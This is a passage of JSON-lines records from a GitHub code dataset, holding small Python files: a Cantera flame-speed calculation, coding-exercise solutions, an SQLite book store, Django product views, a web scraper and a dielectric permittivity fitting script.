0.0005]) # m\narray_width = np.array([0.003]) # m\n\n# Set case number in each process\ncaseNumber_width = array_width.shape[0]\ncaseNumber_temp = array_temp.shape[0]\ncaseNumber_pres = array_pres.shape[0]\ncaseNumber_phi = array_phi.shape[0]\ncaseNumber_all = caseNumber_width*caseNumber_temp* \\\n caseNumber_pres*caseNumber_phi\n\n# MPI settings\ncomm = MPI.COMM_WORLD\nsize = comm.Get_size()\nrank = comm.Get_rank()\n\nwork1 = (caseNumber_all)//size\nwork2 = (caseNumber_all)%size\ncaseNumber_sta = rank*work1 + min(rank, work2)\ncaseNumber_end = caseNumber_sta + work1-1\nif (work2 > rank): caseNumber_end += 1\nprint('Rank:{:>2}, Case:{:>3}-{}, Total case: {}'.format(\\\n rank, caseNumber_sta, caseNumber_end, caseNumber_all))\n\ncaseNumber = 0\ncasePTdict = {}\nfor cur_width in array_width:\n for cur_phi in array_phi:\n for cur_pres in array_pres:\n for cur_temp in array_temp:\n casePTdict[caseNumber] = [cur_width, cur_phi, cur_pres, cur_temp]\n caseNumber += 1\n\nfilename_sl_hdf = '{}/Results_SL_{}.h5'.format(savedir, key_chem)\nf_sl = h5py.File(filename_sl_hdf, 'w', driver='mpio', comm=MPI.COMM_WORLD)\n\ndsetwidth = f_sl.create_dataset('width',(caseNumber_width,),dtype=\"f\")\ndsetphi = f_sl.create_dataset('phi', (caseNumber_phi,), dtype=\"f\")\ndsetT = f_sl.create_dataset('T', (caseNumber_temp,), dtype=\"f\")\ndsetp = f_sl.create_dataset('p', (caseNumber_pres,), dtype=\"f\")\ndsetpAtm = f_sl.create_dataset('p_atm',(caseNumber_pres,), dtype=\"f\")\ndsetwidth[:] = array_width\ndsetphi[:] = array_phi\ndsetT[:] = array_temp\ndsetp[:] = array_pres\ndsetpAtm[:] = array_presAtm\n\ngrp = f_sl.create_group('SL')\ndsetSL = grp.create_dataset('SL', (caseNumber_all,6), dtype=\"f\")\n\ngas = ct.Solution(chemPath_cti)\n\nfor caseNumber in range(caseNumber_sta, caseNumber_end+1):\n\n cur_width = float(casePTdict[caseNumber][0])\n cur_phi = float(casePTdict[caseNumber][1])\n cur_p = float(casePTdict[caseNumber][2])\n cur_p_atm = cur_p/ct.one_atm\n cur_T = float(casePTdict[caseNumber][3])\n\n gas.TP = (cur_T, cur_p)\n gas.set_equivalence_ratio(cur_phi, fuel=fuel, oxidizer=oxid)\n\n # Set up flame object\n f = ct.FreeFlame(gas, width=cur_width)\n f.set_refine_criteria(ratio=3, slope=0.06, curve=0.12)\n\n # Solve with mixture-averaged transport model\n f.transport_model = 'Mix'\n loglevel = 0 # amount of diagnostic output (0 to 8)\n\n print('Case = {:>4}, width={}, phi={:.2f}, p={}, T={}'.format(caseNumber, \\\n cur_width, cur_phi, cur_p, cur_T))\n\n try:\n\n f.solve(loglevel=loglevel, auto=False)\n\n # Save to HDF container file if h5py is installed\n\n dsetSL[caseNumber] = [cur_width, cur_phi, cur_p, cur_p_atm, cur_T, f.velocity[0]]\n\n if flag_save_profile:\n\n try:\n f.write_hdf('{}/adiabaticFlame_width{}_phi{:.2f}_p{}_T{}.h5'\\\n .format(savedir_profile, cur_width, cur_phi, cur_p, cur_T),\n group='mix', mode='w', description='solution with mixture-averaged transport')\n except ImportError:\n f.write_csv('{}/adiabaticFlame_width{}_phi{:.2f}_p{}_T{}.csv'\\\n .format(savedir_profile, cur_width, cur_phi, cur_p, cur_T), quiet=False)\n\n print('mixture-averaged flamespeed = {0:7f} m/s, maximum HRR = {1} W/m^3'\\\n .format(f.velocity[0], max(f.heat_release_rate)))\n\n except:\n\n dsetSL[caseNumber] = [cur_width, cur_phi, cur_p, cur_p_atm, cur_T, 0]\n f.write_hdf('{}/adiabaticFlame_width{}_phi{:.2f}_p{}_T{}.h5_failure'\\\n .format(savedir_profile, cur_width, cur_phi, cur_p, cur_T), \\\n group='mix', mode='w', description='solution with mixture-averaged transport')\n\n print('Failure')\n\n del f\n\nf_sl.close()\n\n","repo_name":"Keisuke043/Cantera_IDTSL","sub_path":"nHeptane_Lu/calc_SL.py","file_name":"calc_SL.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"38748369513","text":"n = int(input())\nresult = ''\n\nfor i in range(1, n+1):\n number = str(i)\n cnt = 0\n flag = False\n for num in number:\n if num in ['3', '6', '9']:\n cnt += 1\n flag = True\n if flag:\n result += '-'*cnt + \" \"\n else:\n result += number + \" \"\n\nprint(result)","repo_name":"kseenyoung/SWExpertAcademy","sub_path":"D2(RE)/1926 간단한 369게임.py","file_name":"1926 간단한 369게임.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33972382044","text":"# B. Unhappy Hacking (ABC Edit)\n# Difficulty: brown\n# URL: https://atcoder.jp/contests/abc043/tasks/abc043_b\n\ns = input()\nS = \"\"\nfor i in s:\n if i == \"0\":\n S += \"0\"\n elif i == \"1\":\n S += \"1\"\n else:\n S = S[:-1]\nprint(S)\n\n# AC\n# Complete at 2023-07-16T04:36:43.503Z","repo_name":"kangping-git/atcoder_Brown","sub_path":"abc043_b.complete.py","file_name":"abc043_b.complete.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15002203616","text":"# -*- coding: utf-8 -*-\n# @Date : 2018-08-12 11:38:06\n# @Author : mohailang (1198534595@qq.com)\n\n\nclass Solution:\n def maxSubArray(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n # 关键思想:如果前i 个元素的和都没有第i 个元素大,那倒不如直接从这个元素开始找连续数组\n localSum = nums[0] # 保存前i 个元素的和或者第 i个的元素本身,看两者之间哪个比较大(局部最优)\n globalSum = nums[0] # 存储遍历以来最大的localSum值\n length = len(nums)\n for i in range(1, length):\n localSum = max(localSum+nums[i], nums[i])\n globalSum = max(localSum, globalSum)\n return globalSum\n\n # 当前面的累加和thisSum小于0是就置0,丢弃,大于maxSum时,把值赋给maxSum\n thisSum = 0\n maxSum = 0\n for i in range(len(nums)):\n thisSum += nums[i]\n if thisSum > maxSum:\n maxSum = thisSum\n elif thisSum < 0:\n thisSum = 0\n return maxSum\n","repo_name":"WaveMo/Language","sub_path":"Python3/初级算法/动态规划/最大子序和.py","file_name":"最大子序和.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"73414733869","text":"import os\nfrom shutil import copy2\n\nimg_folder = 'images'\nann_folder = 'annotations'\nn_folder = 'output_files'\n\nimg_n_folder = os.path.join(n_folder,img_folder)\nann_n_folder = os.path.join(n_folder,ann_folder)\n\n\ntotal_xml_files = len(os.listdir(ann_folder))\n\nif not os.path.exists(n_folder):\n os.mkdir(n_folder)\n os.mkdir(img_n_folder)\n os.mkdir(ann_n_folder)\nelse:\n print('{}/ existe, processo abortado!!!'.format(n_folder))\n exit()\n\n\nx = 0\np = round(total_xml_files / 100)\n\nfor n,image_file in enumerate(os.scandir(img_folder)):\n img_name = image_file.name\n xml_name = image_file.name.split('.')[0] + '.xml'\n\n xml_path = os.path.join(ann_folder,xml_name)\n\n if os.path.exists(xml_path):\n x += 1\n if x % p == 0:\n print('{}/{} {}%\\n'.format(x,total_xml_files, (x*100/total_xml_files)))\n \n n_xml_file = os.path.join(n_folder,xml_path)\n n_img_path = os.path.join(n_folder,image_file.path)\n\n copy2(image_file.path,n_img_path)\n copy2(xml_path,n_xml_file)\n\n err = False\n if not os.path.exists(n_xml_file):\n print('Erro ao copiar {}'.format(n_xml_file))\n err = True\n if not os.path.exists(n_img_path):\n print('Erro ao copiar {}'.format(n_img_path))\n err = True\n\n if err:\n x -= 1\nprint('{}/{} {}%\\n'.format(x,total_xml_files, (x*100/total_xml_files)))\nprint('Fim')\n ","repo_name":"DanielCastriani/Dataset-Annotations-Generator","sub_path":"file_transfer.py","file_name":"file_transfer.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"5191751936","text":"from typing import List, Dict, Union\nfrom .database_connection import DatabaseConnection\n\n'''\nConcerned with storing and retriving books from database\n'''\nbook = Dict[str, Union[str, int]]\nbooks_file = 'data.db'\n\ndef create_book_table() -> None: #this is type hinting in python which we can use only in pychar which tells us whenever we call this function and try to assign its value to anything that its returns nothing\n # database connection example as context manager\n with DatabaseConnection(books_file) as connection:\n cursor = connection.cursor()\n cursor.execute('Create table books(name text primary key, author text, read integer)')\n '''\n using the database connection normally\n connection = sqlite3.connect(books_file)\n cursor = connection.cursor()\n \n SQLITE only supports only 5 types of data namely: NULL, INTEGER, REAL(floating number), TEXT, BLOB(binary data field to store images, pdf and other stuff)\n \n cursor.execute('Create table books(name text primary key, author text, read integer)')\n\n connection.commit()\n connection.close()'''\n\ndef add_book(name: str, author: str) -> None: #we can also use type hinting for parameters which tells us that what type of data a fun is expectin and can give warnin if there is a data typs mismatch\n with DatabaseConnection(books_file) as connection:\n cursor = connection.cursor()\n #below statement is not recommended in dqlite execute because of the f string, so we will do another approach. It causes sql injection attack\n #cursor.execute(f'Insert into books values(\"{name}\", \"{author}\", 0)') #giving double quotes so that sqlite should know that we are giving strings\n cursor.execute('Insert into books values(?, ?, 0)', (name, author)) #sqlite automatically puts the value of name and author in the place specified by ? order wise\n\n\ndef list_books() -> List[book]: # for list and dict we need to import the required module which tells which type it belongs to the calling side\n with DatabaseConnection(books_file) as connection:\n cursor = connection.cursor()\n\n cursor.execute('Select * from books')\n #books = cursor.fetchall() #fetch all the rows of the books table, gives list of tuples [(name , author read), (name, author, read)]\n #instead of above statement we can do a dictionary comprehension to have all the details in the same format as we want\n\n books = [{'name': row[0], 'author': row[1], 'read': row[2]} for row in cursor.fetchall()]\n\n return books\n\ndef mark_read_book(name) -> None: #we can use this type hinting only in pycharm as pychar only supports it for efficient coding\n with DatabaseConnection(books_file) as connection:\n cursor = connection.cursor()\n\n cursor.execute('Update books set read=1 where name = ?', (name,)) #we should always give the values as tuple or else it will execute it as arguments\n\n\ndef delete_book(name) -> None:\n with DatabaseConnection(books_file) as connection:\n cursor = connection.cursor()\n\n cursor.execute('Delete from books where name = ?', (name,))\n","repo_name":"anishverma2/MyLearning","sub_path":"Milestone Project 2/utils/databases_sqlite.py","file_name":"databases_sqlite.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6014383597","text":"from django.shortcuts import render,redirect\nfrom.forms import productAddform\nfrom django.contrib import messages\nfrom.models import ProductDetails\n\nfrom django.contrib.auth.decorators import login_required\n# Create your views here.\n@login_required(login_url=\"SignIn\")\ndef Addproducts(request):\n form = productAddform()\n if request.method==\"POST\":\n form = productAddform(request.POST,request.FILES)\n if form.is_valid():\n product = form.save()\n product.merchant = request.user\n product.save()\n messages.info(request,\"Product Added To list\")\n return redirect('Addproducts')\n \n return render(request,\"addproduct.html\",{\"form\":form})\n\n@login_required(login_url=\"SignIn\")\ndef ProductViewMerchant(request):\n products = ProductDetails.objects.all()\n context ={\n \"products\":products\n }\n return render(request,\"productlistview.html\",context)\n\n@login_required(login_url=\"SignIn\")\ndef DeleteProduct(request,pk):\n product = ProductDetails.objects.get(productId = pk)\n product.product_image.delete()\n product.delete()\n messages .info(request,\"product deleted\")\n return redirect(\"ProductViewMerchant\")\n\n@login_required(login_url=\"SignIn\")\ndef updateproduct(request,pk):\n product=ProductDetails.objects.filter(productId=pk)\n if request.method == \"POST\":\n \n \n pname = request.POST[\"pname\"]\n pbrand = request.POST[\"pbrand\"]\n pdisc = request.POST[\"pdisc\"]\n pstock = request.POST[\"pstock\"]\n pcat = request.POST[\"pcat\"]\n price = request.POST[\"price\"]\n image = request.FILES[\"image\"]\n \n item = ProductDetails.objects.get(productId=pk)\n \n item.produc_tName =pname\n item.product_Brand =pbrand\n item.product_Discription =pdisc\n item. product_price= price\n item.product_category =pcat\n item.product_stock =pstock\n item.product_image.delete()\n item.product_image = image\n item.save()\n messages.info(request,\"item updated\")\n return redirect(\"updateproduct\",pk=pk)\n context={\n \"product\":product\n }\n return render(request,\"updateproduct.html\",context)\n\ndef viewproduct(request,pk):\n product=ProductDetails.objects.filter(productId=pk)\n context = {\n \"product\":product\n }\n return render(request,\"viewproduct.html\",context)\n\ndef CartView (request):\n return render(request,\"cart.html\")","repo_name":"NavyaChandran139/Ecommerce","sub_path":"Product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"260142660","text":"from typing import Optional\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n def __str__(self) -> str:\n node = self\n response = ''\n while node:\n response += f'{node.val}, '\n node = node.next\n\n response = response[:-2]\n return response\n\n def __repr__(self) -> str:\n return str(self.val)\n\nclass Solution:\n def reverseKGroup(self, head: Optional[ListNode], k: int) -> Optional[ListNode]:\n list = self.nodeToList(head)\n len_list = len(list)\n\n if k == 1:\n return head\n\n if len_list < k:\n return head\n\n if k == len_list:\n return self.listToNode(list[::-1])\n\n result = []\n previous = 0\n\n for i in range(k, len_list + 1, k):\n result += list[previous:i][::-1]\n previous = i\n\n module = len_list % k\n if module != 0:\n result += list[-module:]\n\n return self.listToNode(result)\n \n\n\n def listToNode(self, nums):\n if len(nums) > 0:\n node = ListNode(nums[0], self.listToNode(nums[1:]))\n return node\n return None\n\n def nodeToList(self, node):\n result = [node.val]\n while node.next:\n node = node.next\n result.append(node.val)\n return result\n\nif __name__ == '__main__':\n solution = Solution()\n l = solution.listToNode([1,2,3,4,5,6])\n print(solution.reverseKGroup(l, 2))","repo_name":"CaioRuizz/leetcode-problems","sub_path":"Reverse Nodes in k-Group/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"36461761911","text":"from bs4 import BeautifulSoup\nimport requests\nfrom my_web.GeoInfo.models import (\n Estado,\n Ciudad,\n)\n\n\ndef fetch_hidalgo():\n hidalgo = Estado.objects.filter(nombre__icontains='hidalgo').first()\n\n if hidalgo is not None:\n url = 'https://es.wikipedia.org/wiki/Anexo:Municipios_del_estado_de_Hidalgo'\n response = requests.get(url)\n if response.ok:\n html = response.content\n soup = BeautifulSoup(html)\n tablas = soup.findAll('table')\n if len(tablas) > 0:\n tabla = tablas[0]\n lineas = tabla.findAll('tr')\n for linea in lineas:\n columnas = linea.findAll('td')\n if len(columnas) > 2:\n nombre = columnas[1].text.strip()\n instance, created = Ciudad.objects.get_or_create(nombre=nombre, estado=hidalgo)\n print(\"Ciudad: {} fue Creada: {} - {}\".format(\n nombre,\n created,\n instance\n ))\n else:\n print(\"Algo salio mal\")\n else:\n print(\"El estado no existe\")\n","repo_name":"R3SWebDevelopment/CeroUnoApprenticeshipProgramPython","sub_path":"django/project/my_web/my_utils/GeoInfoFetcher.py","file_name":"GeoInfoFetcher.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"71819664749","text":"\nfrom lxml.html import tostring, fromstring\nimport requests\n\n\ndef main():\n # 세션\n session = requests.Session()\n # 크롤�� 대상 URL\n response = session.get(\"https://www.naver.com\")\n # 신문 링크 리스트 획득\n urls = scrape_news_list_page(response)\n\n # 딕셔너리 타입으로 출력\n print(urls)\n\n # 결과 출력\n for name, url in urls.items():\n print(name, url)\n\n\ndef scrape_news_list_page(response):\n urls = {}\n\n root = fromstring(response.content)\n\n for a in root.xpath('//div[@class=\"thumb_area\"]/div[@class=\"thumb_box _NM_NEWSSTAND_THUMB _NM_NEWSSTAND_THUMB_press_valid\"]'):\n\n name, url = extract_contents(a)\n urls[name] = url\n\n # print(tostring(a, pretty_print=True))\n\n return urls\n\n\ndef extract_contents(dom):\n link = dom.xpath(\"./div/a\")[2].get('href')\n name = dom.xpath(\"./a/img\")[0].get('alt')\n\n return name, link\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"evnif11/crawling-basic","sub_path":"section02-4.py","file_name":"section02-4.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"36577402325","text":"import pytest\nfrom django.urls import reverse\nfrom django.test import TestCase\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\npytestmark = pytest.mark.django_db\n\n\nclass TestNetwork(TestCase):\n url = reverse('add_network')\n post_data_network1 = {\n 'network_name': 'Network010',\n 'network_description': 'Description of Network1',\n 'located_in_cloud': True\n }\n post_data_network2 = {\n 'network_name': 'Network020',\n 'network_description': 'Description of Network2',\n 'located_in_cloud': True\n }\n\n def test_create_two_network_per_user(self):\n self.client.force_login(User.objects.create_user(username='foobar', password='password'))\n response_for_network1 = self.client.post(self.url, self.post_data_network1)\n response_for_network2 = self.client.post(self.url, self.post_data_network2)\n\n home_page = self.client.get(reverse('networkResources'))\n\n self.assertEqual(response_for_network1.status_code, 302)\n self.assertEqual(response_for_network2.status_code, 302)\n self.assertRedirects(response_for_network1, reverse('networkResources'))\n self.assertRedirects(response_for_network2, reverse('networkResources'))\n self.assertContains(home_page, 'Network010')\n self.assertContains(home_page, 'Network020')\n\n","repo_name":"cornyhorse-old-projects/Dashboard","sub_path":"dashboard/dashboard/compute/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"20090061456","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 11 23:41:29 2021\n\"\"\"\n\nfrom PyOECP import Models\nfrom PyOECP import References\nfrom PyOECP import Transform\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport copy\n\n''' Example 3 Aqueous sodium chloride solution\nThe goals of this script is as follows.\n\n(1) We will see if the selection of reference liquids can have a significant impact on the accuracy.\n(2) We will check if the implemention of the EP correction algorithm is okay.\n\nFor goal (1), we will do the following things.\n(a) Convert the reflection coefficients in NaCl (aq) 0.18 M solution from a VNA. \n We will use (open, short, water, and acetone) in the first set.\n(b) Convert the reflection coefficients in NaCl (aq) 0.18 M solution from a VNA.\n We will use (open, short, water, and NaCl (aq) 0.09 M) in the second set.\n(c) Compare the results from (a) and (b).\n\nFor goal (2), we will do the following things.\n(a) Use NaCl (aq) 1.44 M as a reference liquid. Peyman model is used.\n(3) Subtract the specific conductance contribution and EP contribution from NaCl (aq) 0.18 M.\n\nThe data files and VNAs are as follows.\nShort: S11Short.csv\nOpen: S11Open.csv\nAcetone: S11Acetone.csv\nWater: S11Water.csv\nNaCl (aq) 0.09 M: S11NaClL1.csv\nNaCl (aq) 0.18 M: S11NaClL2.csv\nNaCl (aq) 1.44 M: S11NaClH.csv\n'''\n\nnp.random.seed(881346)\n\nT = 25\nepsilon0 = 8.8541878128e-12\n\n''' 3.1. Let's examine the influence of references. '''\naddress = 'data/'\nS11r0 = References.Parser(address + 'S11ShortL.csv')\nS11r1 = References.Parser(address + 'S11OpenL.csv')\nS11r21 = References.Parser(address + 'S11NaClL1.csv') \nS11r22 = References.Parser(address + 'S11WaterL.csv') \nS11r3 = References.Parser(address + 'S11AcetoneL.csv')\n\nS11m = References.Parser(address + 'S11NaClL2.csv')\n\nfrequency = S11r1[:,0]\n\nTransformModel = Transform.Marsland(frequency,S11m,S11r0,S11r1,S11r21,S11r3,\n m2='Open',m3='NaClAqueous_Peyman',m4='Acetone_Wei',temperature=T,\n Window=101,concentrations=[None,None,0.09,None])\nMarslandData1 = TransformModel.Calculate()\n\nTransformModel = Transform.Marsland(frequency,S11m,S11r0,S11r1,S11r22,S11r3,\n m2='Open',m3='Water_Kaatze',m4='Acetone_Wei',temperature=T,\n Window=101,concentrations=[None,None,None,None])\nMarslandData2 = TransformModel.Calculate()\n\n''' Check if the Komarov model yields the similar result. '''\nTransformModel = Transform.Komarov(frequency, S11m, S11r1, S11r3, S11r21,\n 'Open','Acetone_Wei','NaClAqueous_Peyman',\n 0.3,0.8,2.1+0*1j,M=50,Window=51,\n concentrations=[None,None,0.09])\n\nKomarovData1 = TransformModel.epsilon\n\nTransformModel = Transform.Komarov(frequency, S11m, S11r1, S11r3, S11r22,\n 'Open','Acetone_Wei','Water_Kaatze',\n 0.3,0.8,2.1+0*1j,M=50,Window=51,\n concentrations=[None,None,None])\n\nKomarovData2 = TransformModel.epsilon\n\n# Reference data generation.\nPeyman = References.NaClAqueous_Peyman(frequency,c=0.18)['epsilon']\n\n''' Let's visualize the data. '''\nfig, (ax1,ax2) = plt.subplots(2,1)\nfig.set_size_inches((5,8))\nfig.set_dpi(300)\nfont = {'size':15}\nplt.rc('font', **font)\nplt.rcParams['font.family'] = 'serif'\n\nspacing = 10\n\nax1.semilogx(frequency[::spacing],np.real(MarslandData1)[::spacing],'o',\n markerfacecolor='None',markeredgecolor='red',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon'$ (Marsland, NaCl ref.)\")\nax1.semilogx(frequency[::spacing],-np.imag(MarslandData1)[::spacing],'o',\n markerfacecolor='None',markeredgecolor='blue',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon''$ (Marsland, NaCl ref.)\")\nax1.semilogx(frequency[::spacing],np.real(MarslandData2)[::spacing],'s',\n markerfacecolor='None',markeredgecolor='red',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon'$ (Marsland, Water ref.)\")\nax1.semilogx(frequency[::spacing],-np.imag(MarslandData2)[::spacing],'s',\n markerfacecolor='None',markeredgecolor='blue',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon''$ (Marsland, Water ref.)\")\nax1.semilogx(frequency,np.real(Peyman),'r',linewidth=2,label=\"$\\epsilon'$ (Peyman, c=0.18 M)\")\n\nax1.semilogx(frequency[::spacing],np.real(KomarovData1)[::spacing],'>',\n markerfacecolor='None',markeredgecolor='red',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon'$ (Komarov, NaCl ref.)\")\nax1.semilogx(frequency[::spacing],-np.imag(KomarovData1)[::spacing],'>',\n markerfacecolor='None',markeredgecolor='blue',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon''$ (Komarov, NaCl ref.)\")\nax1.semilogx(frequency[::spacing],np.real(KomarovData2)[::spacing],'p',\n markerfacecolor='None',markeredgecolor='red',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon'$ (Komarov, Water ref.)\")\nax1.semilogx(frequency[::spacing],-np.imag(KomarovData2)[::spacing],'p',\n markerfacecolor='None',markeredgecolor='blue',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon''$ (Komarov, Water ref.)\")\nax1.semilogx(frequency,-np.imag(Peyman),'b',linewidth=2, label=\"$\\epsilon''$ (Peyman, c=0.18 M)\")\n\n#ax1.xlabel(\"frequency [Hz]\")\nax1.set_ylabel(\"$\\epsilon$\")\nax1.set_ylim([0,160])\nax1.legend(loc='upper right', ncol=2, fontsize=7,edgecolor='k')\nax1.text(-0.25,1,'(a)',transform=ax1.transAxes)\n#ax1.show()\n#plt.savefig('Figure6.pdf',dpi=300)\n\n\n''' 3.2. High-concentration NaCl (aq)\nLet's examine the influence of references. '''\naddress = 'data/'\nS11r0 = References.Parser(address + 'S11ShortH.csv')\nS11r1 = References.Parser(address + 'S11OpenH.csv')\nS11r2 = References.Parser(address + 'S11WaterH.csv') \nS11r3 = References.Parser(address + 'S11AcetoneH.csv')\n\nS11m = References.Parser(address + 'S11NaClH.csv')\n\nfrequency = S11r1[:,0]\n\nTransformModel = Transform.Komarov(frequency, S11m, S11r0, S11r1, S11r2, \n 'Short','Open','Water_Kaatze',\n 0.3,0.8,2.1+0*1j,M=50,Window=81,\n concentrations=[None,None,None],temperature=T)\n\nKomarovData = TransformModel.epsilon\n\nPeyman = References.NaClAqueous_Peyman(frequency,c=1.44,temperature=T)['epsilon']\n\n''' Let's visualize the data in terms of the permittivity. '''\n\nspacing = 8\n\npar = Models.Parameters()\n''''3.2.2. Initial estimation of the conductance.'''\nrelaxation = -np.imag(KomarovData)\nrelaxation = relaxation[frequency<5e8]\nfrequencyL = frequency[frequency<5e8]\n\nconductance = lambda x, a: x/(2*np.pi*a*epsilon0)\nfrom scipy.optimize import curve_fit\npopt = curve_fit(conductance,frequencyL,relaxation)\nconductance = popt[0]\n\n''' 3.2.3. Set the initial model parameters. We will use the Cole-Cole model. '''\npar.Set('ei',1.0)\npar.Set('conductance',conductance)\npar.Set('As',[0.6])\npar.Set('magnitudes',70.0)\npar.Set('times',1/(2*np.pi*2e10))\npar.Set('CPEs',[400,.9])\nlb = copy.deepcopy(par)\nub = copy.deepcopy(par)\npar = par.Parameters()\nlb.Set('conductance',par['conductance']*0.5)\nub.Set('conductance',par['conductance']*1.5)\nlb.Set('magnitudes',30.0)\nub.Set('magnitudes',90.0)\nlb.Set('times',1/(2*np.pi*1e10))\nub.Set('times',1/(2*np.pi*3e10))\nlb.Set('As',0.0)\nub.Set('As',1.0)\nlb.Set('CPEs',[0.0,0.0])\nub.Set('CPEs',[np.inf,1.0])\n\nproduction = 30000\n\nlb = lb.Parameters()\nub = ub.Parameters()\n\nNames = lb.keys()\nfor Name in Names:\n if lb[Name] is None:\n continue\n else:\n for ele in range(len(lb[Name])):\n lb[Name][ele] = 0.0\n ub[Name][ele] = np.inf\n\nTrial = Models.MCMC(frequency,KomarovData,par,production,\n lb=lb,ub=ub,control=None,burnin=None,Rate=0.05)\nchi2s, Chain, par2 = Trial.Run()\n\nFittedData = Models.Discrete(frequency,par2)\n\n''' 3.2.4. Compare the result by excluding the electrode polarization effect and conductance contribution. '''\npar3 = par2\npar3['CPEs'] = np.array([],ndmin=1)\npar3['conductance'] = np.array([],ndmin=1)\nData = Models.Discrete(frequency,par3)\n\nplt.figure(figsize=(5,4),dpi=300)\nplt.gcf().subplots_adjust(bottom=0.15,left=0.15)\n\nspacing1 = 8\nspacing2 = 10\n\nax2.semilogx(frequency[::spacing1],np.real(KomarovData)[::spacing1],'o',\n markerfacecolor='None',markeredgecolor='red',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon'$ (Komarov)\")\nax2.semilogx(frequency[::spacing1],-np.imag(KomarovData)[::spacing1],'o',\n markerfacecolor='None',markeredgecolor='blue',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon''$ (Komarov)\")\n\nax2.semilogx(frequency[::spacing2],np.real(Data)[::spacing2],'s',\n markerfacecolor='None',markeredgecolor='red',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon'$ (EP & $\\kappa$ correction)\")\nax2.semilogx(frequency[::spacing2],-np.imag(Data)[::spacing2],'s',\n markerfacecolor='None',markeredgecolor='blue',\n markeredgewidth=1.0,markersize=7,label=\"$\\epsilon''$ (EP & $\\kappa$ correction)\")\n\nax2.semilogx(frequency,np.real(Peyman),'r',linewidth=2,label=\"$\\epsilon'$ (Peyman, c=1.44 M)\")\nax2.semilogx(frequency,-np.imag(Peyman),'b',linewidth=2, label=\"$\\epsilon''$ (Peyman, c=1.44 M)\")\n\nax2.set_xlabel(\"frequency [Hz]\")\nax2.set_ylabel(\"$\\epsilon$\")\nax2.set_ylim([0,300])\nax2.legend(loc='upper right', ncol=1, fontsize='xx-small',edgecolor='k')\nax2.text(-0.25,1,'(b)',transform=ax2.transAxes)\nfig.savefig('Figure6.pdf',format='pdf',dpi=300,bbox_inches='tight')","repo_name":"tyoon124/PyOECP","sub_path":"PyOECP/Examples/Example3-NaCl(aq)/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":9659,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"} +{"seq_id":"30739731193","text":"\"\"\"\nUnique Paths\n\nA robot is located at the top-left corner of a m*n grid(marked 'Start' in the diagram \nbelow.)\nThe robot can only move either down or right at any point in time. The robot is trying\nto reach the bottom-right corner of the grid(marked 'Finish' in the diagram below).\n\nHow many possible unique paths are there?\n\nExample 1:\n\n[ S | | | | | | |\n\n| | | | | | | |\n\n| | | | | | | F ]\n\nsol\n\n[ 28| 21|15 |10 | 6 | 3 | 1 |0\n\n| 7 | 6 | 5 | 4 | 3 | 2 | 1 |0\n\n| 1 | 1 | 1 | 1 | 1 | 1 | 1 ]0\n 0 0 0 0 0 0 0\n\nm =3, n=7\nOutput=28\n\"\"\"\nimport unittest\nclass Solution:\n\n # time complexity: O(n * m) | space complexity: O(n) coz it is the length of the row\n def unique_paths(self, m:int, n: int)-> int:\n row =[1] * n # bottom row (n is length of number of rows)\n\n for i in range(m-1): # go through all the other rows except for the last one\n newRow =[1] * n # new row is above the bottom(old) row\n # go through all columns except the rightmost column coz it is going to be 1\n # coz all last values in every single row are 1\n for j in range(n-2, -1, -1): \n newRow[j] = newRow[j + 1] + row[j] # row[j] is the value below in the old row\n row = newRow\n return row[0]\n \nclass TestUniquePaths(unittest.TestCase):\n\n def __init__(self, methodName: str = \"runTest\") -> None:\n super().__init__(methodName)\n self.sol = Solution()\n\n def test_unique_paths(self):\n self.assertEqual(28, self.sol.unique_paths(7, 3))\n\nif __name__==\"__main__\":\n unittest.main()","repo_name":"Chemokoren/Algorithms-1","sub_path":"neetcode/Dynamic 